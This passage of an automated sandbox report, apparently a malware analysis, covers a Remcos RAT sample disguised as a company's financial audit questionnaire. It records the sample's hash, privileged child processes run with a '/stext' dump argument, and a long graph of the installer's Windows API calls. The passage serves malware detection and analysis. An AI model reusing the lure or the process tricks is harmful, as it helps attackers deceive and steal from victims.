                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:12
                                                                                                  Start time:11:05:05
                                                                                                  Start date:16/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\kcthojq"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:777'304 bytes
                                                                                                  MD5 hash:E1DC71BE5B3466D47A4934013BE9B604
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:11:05:05
                                                                                                  Start date:16/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\mfyzpcbefou"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:777'304 bytes
                                                                                                  MD5 hash:E1DC71BE5B3466D47A4934013BE9B604
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:14
                                                                                                  Start time:11:05:05
                                                                                                  Start date:16/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\xzlsqumgtwmcyb"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:777'304 bytes
                                                                                                  MD5 hash:E1DC71BE5B3466D47A4934013BE9B604
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:20.5%
                                                                                                    Dynamic/Decrypted Code Coverage:13.9%
                                                                                                    Signature Coverage:20.9%
                                                                                                    Total number of Nodes:1516
                                                                                                    Total number of Limit Nodes:45
                                                                                                    execution_graph 4980 10001000 4983 1000101b 4980->4983 4990 10001516 4983->4990 4985 10001020 4986 10001024 4985->4986 4987 10001027 GlobalAlloc 4985->4987 4988 1000153d 3 API calls 4986->4988 4987->4986 4989 10001019 4988->4989 4992 1000151c 4990->4992 4991 10001522 4991->4985 4992->4991 4993 1000152e GlobalFree 4992->4993 4993->4985 4994 401d41 GetDC GetDeviceCaps 4995 402b1d 18 API calls 4994->4995 4996 401d5f MulDiv ReleaseDC 4995->4996 4997 402b1d 18 API calls 4996->4997 4998 401d7e 4997->4998 4999 405fae 18 API calls 4998->4999 5000 401db7 CreateFontIndirectW 4999->5000 5001 4024e8 5000->5001 4014 403cc2 4015 403e15 4014->4015 4016 403cda 4014->4016 4018 403e66 4015->4018 4019 403e26 GetDlgItem GetDlgItem 4015->4019 4016->4015 4017 403ce6 4016->4017 4020 403cf1 SetWindowPos 4017->4020 4021 403d04 4017->4021 4023 403ec0 4018->4023 4031 401389 2 API calls 4018->4031 4022 40419a 19 API calls 4019->4022 4020->4021 4025 403d21 4021->4025 4026 403d09 ShowWindow 4021->4026 4027 403e50 SetClassLongW 4022->4027 4044 403e10 4023->4044 4084 4041e6 4023->4084 4028 403d43 4025->4028 4029 403d29 DestroyWindow 4025->4029 4026->4025 4030 40140b 2 API calls 4027->4030 4032 403d48 SetWindowLongW 4028->4032 4033 403d59 4028->4033 4083 404123 4029->4083 4030->4018 4034 403e98 4031->4034 4032->4044 4037 403e02 4033->4037 4038 403d65 GetDlgItem 4033->4038 4034->4023 4039 403e9c SendMessageW 4034->4039 4035 40140b 2 API calls 4054 403ed2 4035->4054 4036 404125 DestroyWindow EndDialog 4036->4083 4103 404201 4037->4103 4042 403d95 4038->4042 4043 403d78 SendMessageW IsWindowEnabled 4038->4043 4039->4044 4041 404154 ShowWindow 4041->4044 4046 403da2 4042->4046 4047 403de9 SendMessageW 4042->4047 4048 403db5 4042->4048 4057 403d9a 4042->4057 4043->4042 4043->4044 4045 405fae 18 API calls 4045->4054 4046->4047 4046->4057 4047->4037 4051 403dd2 4048->4051 4052 403dbd 4048->4052 4050 40419a 19 API calls 4050->4054 4056 40140b 2 API calls 4051->4056 4097 40140b 4052->4097 4053 403dd0 4053->4037 4054->4035 4054->4036 4054->4044 4054->4045 4054->4050 4074 404065 DestroyWindow 4054->4074 4087 40419a 4054->4087 4058 403dd9 4056->4058 4100 404173 4057->4100 4058->4037 4058->4057 4060 403f4d GetDlgItem 4061 403f62 4060->4061 4062 403f6a ShowWindow KiUserCallbackDispatcher 4060->4062 4061->4062 4090 4041bc KiUserCallbackDispatcher 4062->4090 4064 403f94 EnableWindow 4067 403fa8 4064->4067 4065 403fad GetSystemMenu EnableMenuItem SendMessageW 4066 403fdd SendMessageW 4065->4066 4065->4067 4066->4067 4067->4065 4091 4041cf SendMessageW 4067->4091 4092 405f8c lstrcpynW 4067->4092 4070 40400b lstrlenW 4071 405fae 18 API calls 4070->4071 4072 404021 SetWindowTextW 4071->4072 4093 401389 4072->4093 4075 40407f CreateDialogParamW 4074->4075 4074->4083 4076 4040b2 4075->4076 4075->4083 4077 40419a 19 API calls 4076->4077 4078 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4077->4078 4079 401389 2 API calls 4078->4079 4080 404103 4079->4080 4080->4044 4081 40410b ShowWindow 4080->4081 4082 4041e6 SendMessageW 4081->4082 4082->4083 4083->4041 4083->4044 4085 4041fe 4084->4085 4086 4041ef SendMessageW 4084->4086 4085->4054 4086->4085 4088 405fae 18 API calls 4087->4088 4089 4041a5 SetDlgItemTextW 4088->4089 4089->4060 4090->4064 4091->4067 4092->4070 4094 401390 4093->4094 4095 4013fe 4094->4095 4096 4013cb MulDiv SendMessageW 4094->4096 4095->4054 4096->4094 4098 401389 2 API calls 4097->4098 4099 401420 4098->4099 4099->4057 4101 404180 SendMessageW 4100->4101 4102 40417a 4100->4102 4101->4053 4102->4101 4104 4042a2 4103->4104 4105 404219 GetWindowLongW 4103->4105 4104->4044 4105->4104 4106 40422a 4105->4106 4107 404239 GetSysColor 4106->4107 4108 40423c 4106->4108 4107->4108 4109 404242 SetTextColor 4108->4109 4110 40424c SetBkMode 4108->4110 4109->4110 4111 404264 GetSysColor 4110->4111 4112 40426a 4110->4112 4111->4112 4113 404271 SetBkColor 4112->4113 4114 40427b 4112->4114 4113->4114 4114->4104 4115 404295 CreateBrushIndirect 4114->4115 4116 40428e DeleteObject 4114->4116 4115->4104 4116->4115 5002 401a42 5003 402b1d 18 API calls 5002->5003 5004 401a48 5003->5004 5005 402b1d 18 API calls 5004->5005 5006 4019f0 5005->5006 5014 402746 5015 402741 5014->5015 5015->5014 5016 402756 FindNextFileW 5015->5016 5017 4027a8 5016->5017 5019 402761 5016->5019 5020 405f8c lstrcpynW 5017->5020 5020->5019 5021 401cc6 5022 402b1d 18 API calls 5021->5022 5023 401cd9 SetWindowLongW 5022->5023 5024 4029c7 5023->5024 4257 401dc7 4265 402b1d 4257->4265 4259 401dcd 4260 402b1d 18 API calls 4259->4260 4261 401dd6 4260->4261 4262 401de8 EnableWindow 4261->4262 4263 401ddd ShowWindow 4261->4263 4264 4029c7 4262->4264 4263->4264 4266 405fae 18 API calls 4265->4266 4267 402b31 4266->4267 4267->4259 5025 401bca 5026 402b1d 18 API calls 5025->5026 5027 401bd1 5026->5027 5028 402b1d 18 API calls 5027->5028 5029 401bdb 5028->5029 5030 402b3a 18 API calls 5029->5030 5034 401beb 5029->5034 5030->5034 5031 402b3a 18 API calls 5035 401bfb 5031->5035 5032 401c06 5036 402b1d 18 API calls 5032->5036 5033 401c4a 5037 402b3a 18 API calls 5033->5037 5034->5031 5034->5035 5035->5032 5035->5033 5038 401c0b 5036->5038 5039 401c4f 5037->5039 5040 402b1d 18 API calls 5038->5040 5041 402b3a 18 API calls 5039->5041 5042 401c14 5040->5042 5043 401c58 FindWindowExW 5041->5043 5044 401c3a SendMessageW 5042->5044 5045 401c1c SendMessageTimeoutW 5042->5045 5046 401c7a 5043->5046 5044->5046 5045->5046 5047 40194b 5048 402b1d 18 API calls 5047->5048 5049 401952 5048->5049 5050 402b1d 18 API calls 5049->5050 5051 40195c 5050->5051 5052 402b3a 18 API calls 5051->5052 5053 401965 5052->5053 5054 401979 lstrlenW 5053->5054 5056 4019b5 5053->5056 5055 401983 5054->5055 5055->5056 5060 405f8c lstrcpynW 5055->5060 5058 40199e 5058->5056 5059 4019ab lstrlenW 5058->5059 5059->5056 5060->5058 5064 4024cc 5065 402b3a 18 API calls 5064->5065 5066 4024d3 5065->5066 5069 405bf8 GetFileAttributesW CreateFileW 5066->5069 5068 4024df 5069->5068 5070 40164d 5071 402b3a 18 API calls 5070->5071 5072 401653 5071->5072 5073 4062cf 2 API calls 5072->5073 5074 401659 5073->5074 5075 4019cf 5076 402b3a 18 API calls 5075->5076 5077 4019d6 5076->5077 5078 402b3a 18 API calls 5077->5078 5079 4019df 5078->5079 5080 4019e6 lstrcmpiW 5079->5080 5081 4019f8 lstrcmpW 5079->5081 5082 4019ec 5080->5082 5081->5082 4289 401e51 4290 402b3a 18 API calls 4289->4290 4291 401e57 4290->4291 4292 405234 25 API calls 4291->4292 4293 401e61 4292->4293 4307 405703 CreateProcessW 4293->4307 4296 401ec6 CloseHandle 4299 402793 4296->4299 4297 401e77 WaitForSingleObject 4298 401e89 4297->4298 4300 401e9b GetExitCodeProcess 4298->4300 4310 40632f 4298->4310 4302 401eba 4300->4302 4303 401ead 4300->4303 4302->4296 4306 401eb8 4302->4306 4314 405ed3 wsprintfW 4303->4314 4306->4296 4308 401e67 4307->4308 4309 405736 CloseHandle 4307->4309 4308->4296 4308->4297 4308->4299 4309->4308 4311 40634c PeekMessageW 4310->4311 4312 406342 DispatchMessageW 4311->4312 4313 401e90 WaitForSingleObject 4311->4313 4312->4311 4313->4298 4314->4306 4389 401752 4390 402b3a 18 API calls 4389->4390 4391 401759 4390->4391 4392 401781 4391->4392 4393 401779 4391->4393 4429 405f8c lstrcpynW 4392->4429 4428 405f8c lstrcpynW 4393->4428 4396 40177f 4400 406220 5 API calls 4396->4400 4397 40178c 4398 4059d7 3 API calls 4397->4398 4399 401792 lstrcatW 4398->4399 4399->4396 4417 40179e 4400->4417 4401 4062cf 2 API calls 4401->4417 4402 405bd3 2 API calls 4402->4417 4404 4017b0 CompareFileTime 4404->4417 4405 401870 4407 405234 25 API calls 4405->4407 4406 401847 4408 405234 25 API calls 4406->4408 4426 40185c 4406->4426 4410 40187a 4407->4410 4408->4426 4409 405f8c lstrcpynW 4409->4417 4411 403062 46 API calls 4410->4411 4412 40188d 4411->4412 4413 4018a1 SetFileTime 4412->4413 4415 4018b3 CloseHandle 4412->4415 4413->4415 4414 405fae 18 API calls 4414->4417 4416 4018c4 4415->4416 4415->4426 4418 4018c9 4416->4418 4419 4018dc 4416->4419 4417->4401 4417->4402 4417->4404 4417->4405 4417->4406 4417->4409 4417->4414 4427 405bf8 GetFileAttributesW CreateFileW 4417->4427 4430 405768 4417->4430 4420 405fae 18 API calls 4418->4420 4421 405fae 18 API calls 4419->4421 4422 4018d1 lstrcatW 4420->4422 4423 4018e4 4421->4423 4422->4423 4425 405768 MessageBoxIndirectW 4423->4425 4425->4426 4427->4417 4428->4396 4429->4397 4431 40577d 4430->4431 4432 4057c9 4431->4432 4433 405791 MessageBoxIndirectW 4431->4433 4432->4417 4433->4432 4434 402253 4435 402261 4434->4435 4436 40225b 4434->4436 4438 402b3a 18 API calls 4435->4438 4439 40226f 4435->4439 4437 402b3a 18 API calls 4436->4437 4437->4435 4438->4439 4440 40227d 4439->4440 4442 402b3a 18 API calls 4439->4442 4441 402b3a 18 API calls 4440->4441 4443 402286 WritePrivateProfileStringW 4441->4443 4442->4440 5083 402454 5084 402c44 19 API calls 5083->5084 5085 40245e 5084->5085 5086 402b1d 18 API calls 5085->5086 5087 402467 5086->5087 5088 40248b RegEnumValueW 5087->5088 5089 40247f RegEnumKeyW 5087->5089 5090 402793 5087->5090 5088->5090 5091 4024a4 RegCloseKey 5088->5091 5089->5091 5091->5090 5093 401ed4 5094 402b3a 18 API calls 5093->5094 5095 401edb 5094->5095 5096 4062cf 2 API calls 5095->5096 5097 401ee1 5096->5097 5099 401ef2 5097->5099 5100 405ed3 wsprintfW 5097->5100 5100->5099 4513 4022d5 4514 402305 4513->4514 4515 4022da 4513->4515 4516 402b3a 18 API calls 4514->4516 4517 402c44 19 API calls 4515->4517 4518 40230c 4516->4518 4519 4022e1 4517->4519 4525 402b7a RegOpenKeyExW 4518->4525 4520 4022eb 4519->4520 4524 402322 4519->4524 4521 402b3a 18 API calls 4520->4521 4523 4022f2 RegDeleteValueW RegCloseKey 4521->4523 4523->4524 4526 402c0e 4525->4526 4528 402ba5 4525->4528 4526->4524 4527 402bcb RegEnumKeyW 4527->4528 4529 402bdd RegCloseKey 4527->4529 4528->4527 4528->4529 4531 402c02 RegCloseKey 4528->4531 4534 402b7a 3 API calls 4528->4534 4530 4062f6 3 API calls 4529->4530 4532 402bed 4530->4532 4533 402bf1 4531->4533 4532->4533 4535 402c1d RegDeleteKeyW 4532->4535 4533->4526 4534->4528 4535->4533 4543 4014d7 4544 402b1d 18 API calls 4543->4544 4545 4014dd Sleep 4544->4545 4547 4029c7 4545->4547 4762 40335a #17 SetErrorMode OleInitialize 4763 4062f6 3 API calls 4762->4763 4764 40339d SHGetFileInfoW 4763->4764 4837 405f8c lstrcpynW 4764->4837 4766 4033c8 GetCommandLineW 4838 405f8c lstrcpynW 4766->4838 4768 4033da GetModuleHandleW 4769 4033f4 4768->4769 4770 405a04 CharNextW 4769->4770 4771 403402 CharNextW 4770->4771 4779 403414 4771->4779 4772 403516 4773 40352a GetTempPathW 4772->4773 4839 403326 4773->4839 4775 403542 4776 403546 GetWindowsDirectoryW lstrcatW 4775->4776 4777 40359c DeleteFileW 4775->4777 4780 403326 11 API calls 4776->4780 4847 402dbc GetTickCount GetModuleFileNameW 4777->4847 4778 405a04 CharNextW 4778->4779 4779->4772 4779->4778 4785 403518 4779->4785 4782 403562 4780->4782 4782->4777 4784 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4782->4784 4783 4035b0 4786 403663 4783->4786 4789 403653 4783->4789 4793 405a04 CharNextW 4783->4793 4788 403326 11 API calls 4784->4788 4931 405f8c lstrcpynW 4785->4931 4934 40382d 4786->4934 4792 403594 4788->4792 4877 40391f 4789->4877 4792->4777 4792->4786 4805 4035cf 4793->4805 4795 403772 4798 403815 ExitProcess 4795->4798 4803 4062f6 3 API calls 4795->4803 4796 40367c 4797 405768 MessageBoxIndirectW 4796->4797 4799 40368a ExitProcess 4797->4799 4800 403692 lstrcatW lstrcmpiW 4800->4786 4807 4036ae CreateDirectoryW SetCurrentDirectoryW 4800->4807 4801 40362d 4806 405adf 18 API calls 4801->4806 4804 403785 4803->4804 4808 4062f6 3 API calls 4804->4808 4805->4800 4805->4801 4809 403639 4806->4809 4810 4036d1 4807->4810 4811 4036c6 4807->4811 4812 40378e 4808->4812 4809->4786 4932 405f8c lstrcpynW 4809->4932 4944 405f8c lstrcpynW 4810->4944 4943 405f8c lstrcpynW 4811->4943 4815 4062f6 3 API calls 4812->4815 4817 403797 4815->4817 4819 4037b5 4817->4819 4826 4037a5 GetCurrentProcess 4817->4826 4818 403648 4933 405f8c lstrcpynW 4818->4933 4822 4062f6 3 API calls 4819->4822 4821 405fae 18 API calls 4823 403710 DeleteFileW 4821->4823 4824 4037ec 4822->4824 4825 40371d CopyFileW 4823->4825 4834 4036df 4823->4834 4827 403801 ExitWindowsEx 4824->4827 4830 40380e 4824->4830 4825->4834 4826->4819 4827->4798 4827->4830 4828 403766 4831 405e26 40 API calls 4828->4831 4829 405e26 40 API calls 4829->4834 4832 40140b 2 API calls 4830->4832 4831->4786 4832->4798 4833 405fae 18 API calls 4833->4834 4834->4821 4834->4828 4834->4829 4834->4833 4835 405703 2 API calls 4834->4835 4836 403751 CloseHandle 4834->4836 4835->4834 4836->4834 4837->4766 4838->4768 4840 406220 5 API calls 4839->4840 4841 403332 4840->4841 4842 40333c 4841->4842 4843 4059d7 3 API calls 4841->4843 4842->4775 4844 403344 CreateDirectoryW 4843->4844 4945 405c27 4844->4945 4949 405bf8 GetFileAttributesW CreateFileW 4847->4949 4849 402dff 4876 402e0c 4849->4876 4950 405f8c lstrcpynW 4849->4950 4851 402e22 4852 405a23 2 API calls 4851->4852 4853 402e28 4852->4853 4951 405f8c lstrcpynW 4853->4951 4855 402e33 GetFileSize 4856 402f34 4855->4856 4875 402e4a 4855->4875 4857 402d1a 33 API calls 4856->4857 4859 402f3b 4857->4859 4858 4032f9 ReadFile 4858->4875 4861 402f77 GlobalAlloc 4859->4861 4859->4876 4953 40330f SetFilePointer 4859->4953 4860 402fcf 4863 402d1a 33 API calls 4860->4863 4862 402f8e 4861->4862 4868 405c27 2 API calls 4862->4868 4863->4876 4865 402f58 4866 4032f9 ReadFile 4865->4866 4869 402f63 4866->4869 4867 402d1a 33 API calls 4867->4875 4870 402f9f CreateFileW 4868->4870 4869->4861 4869->4876 4871 402fd9 4870->4871 4870->4876 4952 40330f SetFilePointer 4871->4952 4873 402fe7 4874 403062 46 API calls 4873->4874 4874->4876 4875->4856 4875->4858 4875->4860 4875->4867 4875->4876 4876->4783 4878 4062f6 3 API calls 4877->4878 4879 403933 4878->4879 4880 403939 4879->4880 4881 40394b 4879->4881 4963 405ed3 wsprintfW 4880->4963 4882 405e59 3 API calls 4881->4882 4883 40397b 4882->4883 4885 40399a lstrcatW 4883->4885 4887 405e59 3 API calls 4883->4887 4886 403949 4885->4886 4954 403bf5 4886->4954 4887->4885 4890 405adf 18 API calls 4891 4039cc 4890->4891 4892 403a60 4891->4892 4894 405e59 3 API calls 4891->4894 4893 405adf 18 API calls 4892->4893 4895 403a66 4893->4895 4896 4039fe 4894->4896 4897 403a76 LoadImageW 4895->4897 4898 405fae 18 API calls 4895->4898 4896->4892 4901 403a1f lstrlenW 4896->4901 4904 405a04 CharNextW 4896->4904 4899 403b1c 4897->4899 4900 403a9d RegisterClassW 4897->4900 4898->4897 4903 40140b 2 API calls 4899->4903 4902 403ad3 SystemParametersInfoW CreateWindowExW 4900->4902 4929 403b26 4900->4929 4905 403a53 4901->4905 4906 403a2d lstrcmpiW 4901->4906 4902->4899 4907 403b22 4903->4907 4909 403a1c 4904->4909 4908 4059d7 3 API calls 4905->4908 4906->4905 4910 403a3d GetFileAttributesW 4906->4910 4911 403bf5 19 API calls 4907->4911 4907->4929 4912 403a59 4908->4912 4909->4901 4913 403a49 4910->4913 4915 403b33 4911->4915 4964 405f8c lstrcpynW 4912->4964 4913->4905 4914 405a23 2 API calls 4913->4914 4914->4905 4917 403bc2 4915->4917 4918 403b3f ShowWindow LoadLibraryW 4915->4918 4921 405307 5 API calls 4917->4921 4919 403b65 GetClassInfoW 4918->4919 4920 403b5e LoadLibraryW 4918->4920 4922 403b79 GetClassInfoW RegisterClassW 4919->4922 4923 403b8f DialogBoxParamW 4919->4923 4920->4919 4924 403bc8 4921->4924 4922->4923 4927 40140b 2 API calls 4923->4927 4925 403be4 4924->4925 4926 403bcc 4924->4926 4928 40140b 2 API calls 4925->4928 4926->4929 4930 40140b 2 API calls 4926->4930 4927->4929 4928->4929 4929->4786 4930->4929 4931->4773 4932->4818 4933->4789 4935 403848 4934->4935 4936 40383e CloseHandle 4934->4936 4937 403852 CloseHandle 4935->4937 4938 40385c 4935->4938 4936->4935 4937->4938 4966 40388a 4938->4966 4941 405814 71 API calls 4942 40366c OleUninitialize 4941->4942 4942->4795 4942->4796 4943->4810 4944->4834 4946 405c34 GetTickCount GetTempFileNameW 4945->4946 4947 403358 4946->4947 4948 405c6a 4946->4948 4947->4775 4948->4946 4948->4947 4949->4849 4950->4851 4951->4855 4952->4873 4953->4865 4955 403c09 4954->4955 4965 405ed3 wsprintfW 4955->4965 4957 403c7a 4958 405fae 18 API calls 4957->4958 4959 403c86 SetWindowTextW 4958->4959 4960 403ca2 4959->4960 4961 4039aa 4959->4961 4960->4961 4962 405fae 18 API calls 4960->4962 4961->4890 4962->4960 4963->4886 4964->4892 4965->4957 4967 403898 4966->4967 4968 40389d FreeLibrary GlobalFree 4967->4968 4969 403861 4967->4969 4968->4968 4968->4969 4969->4941 5108 40155b 5109 40296d 5108->5109 5112 405ed3 wsprintfW 5109->5112 5111 402972 5112->5111 5113 4038dd 5114 4038e8 5113->5114 5115 4038ec 5114->5115 5116 4038ef GlobalAlloc 5114->5116 5116->5115 5117 40165e 5118 402b3a 18 API calls 5117->5118 5119 401665 5118->5119 5120 402b3a 18 API calls 5119->5120 5121 40166e 5120->5121 5122 402b3a 18 API calls 5121->5122 5123 401677 MoveFileW 5122->5123 5124 401683 5123->5124 5125 40168a 5123->5125 5126 401423 25 API calls 5124->5126 5127 4062cf 2 API calls 5125->5127 5129 402197 5125->5129 5126->5129 5128 401699 5127->5128 5128->5129 5130 405e26 40 API calls 5128->5130 5130->5124 3953 4023e0 3964 402c44 3953->3964 3955 4023ea 3968 402b3a 3955->3968 3958 4023fe RegQueryValueExW 3960 402424 RegCloseKey 3958->3960 3961 40241e 3958->3961 3959 402793 3960->3959 3961->3960 3974 405ed3 wsprintfW 3961->3974 3965 402b3a 18 API calls 3964->3965 3966 402c5d 3965->3966 3967 402c6b RegOpenKeyExW 3966->3967 3967->3955 3969 402b46 3968->3969 3975 405fae 3969->3975 3972 4023f3 3972->3958 3972->3959 3974->3960 3976 405fbb 3975->3976 3977 406206 3976->3977 3980 40606e GetVersion 3976->3980 3981 4061d4 lstrlenW 3976->3981 3983 405fae 10 API calls 3976->3983 3986 4060e9 GetSystemDirectoryW 3976->3986 3987 4060fc GetWindowsDirectoryW 3976->3987 3988 406220 5 API calls 3976->3988 3989 405fae 10 API calls 3976->3989 3990 406175 lstrcatW 3976->3990 3991 406130 SHGetSpecialFolderLocation 3976->3991 4002 405e59 RegOpenKeyExW 3976->4002 4007 405ed3 wsprintfW 3976->4007 4008 405f8c lstrcpynW 3976->4008 3978 402b67 3977->3978 4009 405f8c lstrcpynW 3977->4009 3978->3972 3993 406220 3978->3993 3980->3976 3981->3976 3983->3981 3986->3976 3987->3976 3988->3976 3989->3976 3990->3976 3991->3976 3992 406148 SHGetPathFromIDListW CoTaskMemFree 3991->3992 3992->3976 4000 40622d 3993->4000 3994 4062a3 3995 4062a8 CharPrevW 3994->3995 3998 4062c9 3994->3998 3995->3994 3996 406296 CharNextW 3996->3994 3996->4000 3998->3972 3999 406282 CharNextW 3999->4000 4000->3994 4000->3996 4000->3999 4001 406291 CharNextW 4000->4001 4010 405a04 4000->4010 4001->3996 4003 405ecd 4002->4003 4004 405e8d RegQueryValueExW 4002->4004 4003->3976 4005 405eae RegCloseKey 4004->4005 4005->4003 4007->3976 4008->3976 4009->3978 4011 405a0a 4010->4011 4012 405a20 4011->4012 4013 405a11 CharNextW 4011->4013 4012->4000 4013->4011 5131 4065e1 5137 406465 5131->5137 5132 406dd0 5133 4064e6 GlobalFree 5134 4064ef GlobalAlloc 5133->5134 5134->5132 5134->5137 5135 406566 GlobalAlloc 5135->5132 5135->5137 5136 40655d GlobalFree 5136->5135 5137->5132 5137->5133 5137->5134 5137->5135 5137->5136 5138 401ce5 GetDlgItem GetClientRect 5139 402b3a 18 API calls 5138->5139 5140 401d17 LoadImageW SendMessageW 5139->5140 5141 401d35 DeleteObject 5140->5141 5142 4029c7 5140->5142 5141->5142 5143 4042e8 lstrlenW 5144 404307 5143->5144 5145 404309 WideCharToMultiByte 5143->5145 5144->5145 5146 100018a9 5148 100018cc 5146->5148 5147 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5150 10001272 2 API calls 5147->5150 5148->5147 5149 100018ff GlobalFree 5148->5149 5149->5147 5151 10001a87 GlobalFree GlobalFree 5150->5151 5152 40206a 5153 402b3a 18 API calls 5152->5153 5154 402071 5153->5154 5155 402b3a 18 API calls 5154->5155 5156 40207b 5155->5156 5157 402b3a 18 API calls 5156->5157 5158 402084 5157->5158 5159 402b3a 18 API calls 5158->5159 5160 40208e 5159->5160 5161 402b3a 18 API calls 5160->5161 5162 402098 5161->5162 5163 4020ac CoCreateInstance 5162->5163 5164 402b3a 18 API calls 5162->5164 5165 4020cb 5163->5165 5164->5163 5166 401423 25 API calls 5165->5166 5167 402197 5165->5167 5166->5167 4271 40156b 4272 401584 4271->4272 4273 40157b ShowWindow 4271->4273 4274 401592 ShowWindow 4272->4274 4275 4029c7 4272->4275 4273->4272 4274->4275 4276 4024ee 4277 4024f3 4276->4277 4278 40250c 4276->4278 4279 402b1d 18 API calls 4277->4279 4280 402512 4278->4280 4281 40253e 4278->4281 4282 4024fa 4279->4282 4283 402b3a 18 API calls 4280->4283 4284 402b3a 18 API calls 4281->4284 4287 402793 4282->4287 4288 402567 WriteFile 4282->4288 4285 402519 WideCharToMultiByte lstrlenA 4283->4285 4286 402545 lstrlenW 4284->4286 4285->4282 4286->4282 4288->4287 5175 4045ee 5176 404624 5175->5176 5177 4045fe 5175->5177 5179 404201 8 API calls 5176->5179 5178 40419a 19 API calls 5177->5178 5180 40460b SetDlgItemTextW 5178->5180 5181 404630 5179->5181 5180->5176 5182 4018ef 5183 401926 5182->5183 5184 402b3a 18 API calls 5183->5184 5185 40192b 5184->5185 5186 405814 71 API calls 5185->5186 5187 401934 5186->5187 5188 402770 5189 402b3a 18 API calls 5188->5189 5190 402777 FindFirstFileW 5189->5190 5191 40279f 5190->5191 5194 40278a 5190->5194 5192 4027a8 5191->5192 5196 405ed3 wsprintfW 5191->5196 5197 405f8c lstrcpynW 5192->5197 5196->5192 5197->5194 5198 4014f1 SetForegroundWindow 5199 4029c7 5198->5199 5200 4018f2 5201 402b3a 18 API calls 5200->5201 5202 4018f9 5201->5202 5203 405768 MessageBoxIndirectW 5202->5203 5204 401902 5203->5204 4444 405373 4445 405394 GetDlgItem GetDlgItem GetDlgItem 4444->4445 4446 40551d 4444->4446 4490 4041cf SendMessageW 4445->4490 4448 405526 GetDlgItem CreateThread CloseHandle 4446->4448 4449 40554e 4446->4449 4448->4449 4493 405307 OleInitialize 4448->4493 4450 405579 4449->4450 4452 405565 ShowWindow ShowWindow 4449->4452 4453 40559e 4449->4453 4454 405585 4450->4454 4455 4055d9 4450->4455 4451 405404 4456 40540b GetClientRect GetSystemMetrics SendMessageW SendMessageW 4451->4456 4492 4041cf SendMessageW 4452->4492 4460 404201 8 API calls 4453->4460 4458 4055b3 ShowWindow 4454->4458 4459 40558d 4454->4459 4455->4453 4463 4055e7 SendMessageW 4455->4463 4461 405479 4456->4461 4462 40545d SendMessageW SendMessageW 4456->4462 4466 4055d3 4458->4466 4467 4055c5 4458->4467 4464 404173 SendMessageW 4459->4464 4465 4055ac 4460->4465 4468 40548c 4461->4468 4469 40547e SendMessageW 4461->4469 4462->4461 4463->4465 4470 405600 CreatePopupMenu 4463->4470 4464->4453 4472 404173 SendMessageW 4466->4472 4471 405234 25 API calls 4467->4471 4474 40419a 19 API calls 4468->4474 4469->4468 4473 405fae 18 API calls 4470->4473 4471->4466 4472->4455 4475 405610 AppendMenuW 4473->4475 4476 40549c 4474->4476 4477 405640 TrackPopupMenu 4475->4477 4478 40562d GetWindowRect 4475->4478 4479 4054a5 ShowWindow 4476->4479 4480 4054d9 GetDlgItem SendMessageW 4476->4480 4477->4465 4481 40565b 4477->4481 4478->4477 4482 4054c8 4479->4482 4483 4054bb ShowWindow 4479->4483 4480->4465 4484 405500 SendMessageW SendMessageW 4480->4484 4485 405677 SendMessageW 4481->4485 4491 4041cf SendMessageW 4482->4491 4483->4482 4484->4465 4485->4485 4486 405694 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4485->4486 4488 4056b9 SendMessageW 4486->4488 4488->4488 4489 4056e2 GlobalUnlock SetClipboardData CloseClipboard 4488->4489 4489->4465 4490->4451 4491->4480 4492->4450 4494 4041e6 SendMessageW 4493->4494 4495 40532a 4494->4495 4498 401389 2 API calls 4495->4498 4499 405351 4495->4499 4496 4041e6 SendMessageW 4497 405363 OleUninitialize 4496->4497 4498->4495 4499->4496 4500 402573 4501 402b1d 18 API calls 4500->4501 4503 402582 4501->4503 4502 4026a0 4503->4502 4504 4025c8 ReadFile 4503->4504 4505 405c7b ReadFile 4503->4505 4506 4026a2 4503->4506 4507 402608 MultiByteToWideChar 4503->4507 4509 40262e SetFilePointer MultiByteToWideChar 4503->4509 4511 4026b3 4503->4511 4504->4502 4504->4503 4505->4503 4512 405ed3 wsprintfW 4506->4512 4507->4503 4509->4503 4510 4026d4 SetFilePointer 4510->4502 4511->4502 4511->4510 4512->4502 5205 401df3 5206 402b3a 18 API calls 5205->5206 5207 401df9 5206->5207 5208 402b3a 18 API calls 5207->5208 5209 401e02 5208->5209 5210 